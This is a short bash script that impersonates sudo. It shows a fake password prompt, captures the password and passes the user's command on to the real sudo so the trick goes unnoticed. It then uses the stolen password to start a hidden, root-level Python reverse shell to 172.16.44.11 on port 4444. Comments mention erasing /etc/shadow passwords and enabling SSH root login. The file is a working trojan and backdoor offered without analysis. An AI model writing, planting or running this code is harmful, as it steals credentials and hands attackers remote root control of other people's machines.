#!/bin/bash
echo -n "[sudo] password for `whoami`: "
read -r -s password
echo ""
echo $password | /usr/bin/sudo -S $*
# Erase /etc/shadow passwords
# Allow SSH Root
echo $password | /usr/bin/sudo -S python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("172.16.44.11",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])' > /dev/null 2> /dev/null &
